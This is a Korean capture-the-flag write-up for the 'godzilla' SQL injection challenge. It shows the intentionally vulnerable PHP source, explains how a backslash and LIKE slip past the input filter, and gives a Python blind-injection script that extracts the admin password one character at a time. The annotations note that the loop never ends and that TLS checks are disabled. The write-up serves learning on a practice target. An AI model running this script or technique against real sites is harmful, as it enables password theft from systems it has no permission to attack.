생각보다 쉽다!

<?php
  // Challenge source (intentionally vulnerable): a two-step login check
  // against prob_godzilla whose first query reflects a boolean oracle.
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // Input filter: rejects id/pw containing "prob", "_", "." or "()" (case-insensitive).
  // Note what the pattern does NOT cover: quotes, backslash, "%", and the LIKE
  // keyword all pass through, which is what the write-up below relies on.
  // `$_GET[id]` / `$_GET[pw]` use bareword keys (legacy undefined-constant
  // fallback to the string 'id'/'pw'); on PHP 8 this is an Error, not a warning.
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~");
  // Unescaped user input is interpolated straight into the SQL string: this is
  // the injection point. The built query is then echoed back to the client.
  $query = "select id from prob_godzilla where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  // `@` only hides mysqli warnings; a failed query yields no row and no message.
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  // Any row with a truthy id prints the banner, so the response body acts as a
  // yes/no oracle for the first query (see the marker string used in the client).
  if($result['id']) echo "<h2>Hello admin</h2>";
   
  // Second step: pw is escaped and the id is fixed to 'admin', so the flag is
  // only awarded when the submitted pw matches the stored one.
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_godzilla where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  // Loose `==` between two strings: PHP compares numeric-looking strings
  // numerically ('1e3' == '1000'), so this is weaker than `===`.
  // Note the comparison uses the already-addslashes()'d $_GET['pw'].
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("godzilla");
  // Source disclosure is deliberate for this challenge.
  highlight_file(__FILE__);
?>

\\ 가 이전 문제처럼 사용 가능하였다.

또 테스트 하다보니 like 가 사용 가능하였다.

다만, like '%'는 필터링인데, like '1%2' 등은 필터링 대상이 아니었다.

소스코드

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable flag warning
# Silences the urllib3 warning only; TLS certificate validation is still turned
# off by verify=False below, so the session cookie is sent to whatever answers.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Placeholder session id; the challenge's login_chk() requires a valid session.
headers = {'Cookie': 'PHPSESSID=##'}

# Boolean-based blind probe: one request per candidate character, using the
# "Hello admin" banner from the first query as the yes/no oracle.
# Defender note: the traffic signature is a burst of requests that differ by a
# single character in the query string and toggle a fixed response fragment;
# that pattern (not the individual request) is what to alert on.
password = ''
# No break or stop condition anywhere below: once no character in the range
# matches (end of the password), the outer loop restarts with the same prefix
# and never terminates.
while True:
    for i in range(0x30, 0x80):
        # '%' is a LIKE wildcard, so each probe tests "known prefix + one char".
        query = password + chr(i) + '%'
        # The surrounding '<' ... '>' and the doubled backslash look like
        # markdown autolink/escape residue from the write-up, not part of the
        # URL the script was actually run with — TODO confirm before reuse.
        url = f"<https://modsec.rubiya.kr/chall/godzilla_799f2ae774c76c0bfd8429b8d5692918.php?id=\\&pw=||pw> like '{query}'-- "

        res = requests.get(url=url, headers=headers, verify=False)

        # Marker matches the server's output: the echoed query ends with
        # "<hr><br>" and is followed by "<h2>Hello admin</h2>" on a hit.
        if res.text.find("<br><h2>Hello admin") != -1:
            password += chr(i)
            print("password : ", password)